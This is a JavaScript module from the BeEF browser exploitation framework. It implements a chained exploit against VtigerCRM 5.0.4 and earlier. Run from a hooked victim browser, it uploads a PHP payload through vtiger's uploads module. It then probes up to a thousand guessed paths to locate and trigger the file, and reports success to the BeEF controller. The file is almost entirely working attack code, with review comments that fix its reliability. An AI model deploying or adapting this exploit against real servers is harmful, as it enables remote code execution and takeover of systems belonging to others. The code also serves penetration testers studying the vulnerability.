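//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)

// Ported to Ruby BeEF by xntrik 2010

//
// How the module runs inside the hooked browser:
//   1) drop a hidden <img id="vtigerimg"> as a "running" marker so the
//      module cannot be started twice on the same page;
//   2) POST a multipart/form-data upload to vtiger's uploads module whose
//      file part is the PHP payload, named mal_filename.mal_ext;
//   3) if the server answered 200, guess where the copy was stored by
//      probing vtiger_filepath + id + "_" + mal_filename.mal_ext for
//      id = 0..1000 and keep the first URL that answers 200;
//   4) remove the marker and send exactly one result line back to BeEF.
//
// The ERB tags (the @-variables) are substituted by the Ruby side of this
// module before the script is delivered; every result message is prefixed
// with "result=" for that side to parse.
//
// NOTE(review): the XHRs never set withCredentials, so in a CORS-aware
// browser the victim's vtiger session cookie only rides along when the hooked
// page shares vtiger's origin - presumably the intended scenario; confirm
// against the module's Ruby side.
//
// Fix carried in this revision: the txtDescription part used to terminate its
// Content-Disposition header with a literal backslash-r ('\\r\n') instead of
// CRLF, producing a malformed multipart body. Every part is now emitted by
// form_field() with a real CRLF, and the body ends with a proper RFC 2046
// close delimiter (boundary + "--"), which was also missing.

beef.execute(function() {

// Run-once guard (same trick as detect_tor): a stale marker means an earlier
// run of this module is still in flight on this page.
// xntrik
if (document.getElementById('vtigerimg')) {
  return "Exploit running already";
}

var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'vtigerimg';
document.body.appendChild(img);

// Declared with var so it stays inside this closure instead of leaking as an
// implicit global onto the hooked page.
var baseurl = "<%= @vtiger_url %>";
var CRLF = '\r\n';

// Remove the run-once marker (if it is still there) and send a single result
// line back to BeEF. Every terminal path of the module ends up here, so the
// marker never outlives the run and a re-run is always possible.
function report_result(message) {
  var marker = document.getElementById('vtigerimg');
  if (marker) {
    document.body.removeChild(marker);
  }
  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + message);
}

// Build an XHR object: the MSXML ActiveX controls first (IE5.x / IE6), then
// the native XMLHttpRequest (IE7, Mozilla, Safari, ...). The last constructor
// is not guarded, so a browser with none of the three throws out of here.
// (Catch identifiers renamed: "native" was a reserved word in ES3.)
function get_ajax() {
  var http_request;
  try {
    http_request = new ActiveXObject("MSXML2.XMLHTTP");
  } catch (msxmlMissing) {
    try {
      http_request = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (activexMissing) {
      http_request = new XMLHttpRequest();
    }
  }
  return http_request;
}

// Start the upload after a short delay so the hook has settled first.
function do_upload(){
  setTimeout(function() { ajax_upload(); }, 1000);
}

// One multipart/form-data part carrying a plain text value. The part is
// introduced by the body delimiter and its value is terminated by CRLF, so
// an empty value yields the blank line vtiger's form expects for that field.
function form_field(boundary, name, value) {
  return boundary + CRLF
    + 'Content-Disposition: form-data; name="' + name + '"' + CRLF
    + CRLF
    + value + CRLF;
}

// In a nutshell:
//
// 1) build the upload URL
// 2) construct the request object and the multipart body
// 3) POST the form asynchronously
// 4) once the upload timeout elapses, judge the outcome from the last
//    readyState/status seen and, on a 200, call do_callfile()
function ajax_upload(){
  var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
  var http_request = get_ajax();
  if (!http_request) {
    // fail silently!
    return false;
  }

  // Body delimiter. It must be "--" followed by the boundary announced in the
  // Content-type header below; both literals are kept as they were.
  var boundary = '-----------------------------PWNED';
  var mal_name = '<%= @mal_filename %>.<%= @mal_ext %>';

  // Field order mirrors vtiger's own upload form.
  var requestbody =
      form_field(boundary, 'MAX_FILE_SIZE', '3000000')
    + form_field(boundary, 'return_module', '')
    + form_field(boundary, 'return_action', '')
    + form_field(boundary, 'return_id', '')
    + form_field(boundary, 'uploadsubject', '')
    // The file part: this is what do_callfile() later tries to locate.
    + boundary + CRLF
    + 'Content-Disposition: form-data; name="filename"; filename="' + mal_name + '"' + CRLF
    + 'Content-Type: application/x-httpd-php' + CRLF
    + CRLF
    // NOTE(review): the PHP payload is interpolated unescaped into a
    // single-quoted JS string; a payload containing a quote, backslash or
    // newline breaks this script, so the Ruby side must escape it - confirm.
    + '<%= @vtiger_php %>' + CRLF
    + CRLF
    + form_field(boundary, 'filename_hidden', mal_name)
    + form_field(boundary, 'txtDescription', 'drop it like its hot')
    + form_field(boundary, 'save', 'Attach')
    // RFC 2046 close delimiter.
    + boundary + '--' + CRLF;

  // 0 = no state change ever fired, 1 = still in flight,
  // 2 = completed with a non-200 status (also 0 on a blocked cross-origin
  //     response), 3 = completed with 200.
  var uploadstate = 0;

  http_request.onreadystatechange = function() {
    if (http_request.readyState == 4) {
      uploadstate = (http_request.status == 200) ? 3 : 2;
    } else {
      uploadstate = 1;
    }
  };
  http_request.open("POST", targeturl, true);
  http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
  // NOTE(review): Content-length is a browser-controlled header and is
  // presumably ignored by modern engines; kept for the legacy ActiveX path.
  http_request.setRequestHeader("Content-length", requestbody.length);
  http_request.send(requestbody);

  // Judge the outcome once the module's upload timeout has elapsed.
  setTimeout(function() {
    if (uploadstate == 0) {
      // something went way wrong
      report_result('Error in file upload');
    } else if (uploadstate == 1) {
      // we never got a response from the server
      report_result('Server did not respond while trying to upload file');
    } else if (uploadstate == 2) {
      // we got a response that was NOT a 200
      report_result('Server gave an invalid response while trying to upload file');
    } else {
      // We got a 200, so hopefully the file was uploaded
      do_callfile(0, 1000);
    }
  }, <%= @upload_timeout %>);

  return;
}

// Hunt for the stored upload. The probe assumes (as the original PoC did)
// that vtiger keeps the file at vtiger_filepath + id + "_" + name.ext with a
// numeric id prefix; ids start .. start+count are tried INCLUSIVELY, one
// synchronous request each, so the page is frozen for the duration. The first
// URL answering 200 is reported. A complete miss or a thrown request error
// also reports back and clears the marker, so the module is not left wedged
// behind the run-once guard.
function do_callfile(start, count){
  if (document.getElementById('vtigerimg') == null) {
    return false;
  }

  var requestbody = "birds of a feather flock together";
  var last = start + count;

  for (var i = start; i <= last; i++) {
    var http_request = get_ajax();
    if (!http_request) {
      // fail silently!
      return false;
    }

    var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";

    try {
      http_request.open('POST', findurl, false);
      http_request.setRequestHeader("Content-length", requestbody.length);
      http_request.send(requestbody);
    } catch (sendError) {
      // A synchronous XHR throws on a network failure; further guesses would
      // only fail the same way, so report and stop.
      report_result('Error while probing for uploaded file (' + findurl + ')');
      return;
    }

    if (http_request.status == 200) {
      report_result('File Uploaded AND Executed (' + findurl + ')');
      return;
    }
  }

  report_result('Upload returned 200 but no uploaded file was found for ids ' + start + ' to ' + last);
  return;
}

// Entry point: start the upload; everything else is driven by callbacks.
function do_main(){
  do_upload();
  return;
}

// Run the sploit
do_main();

});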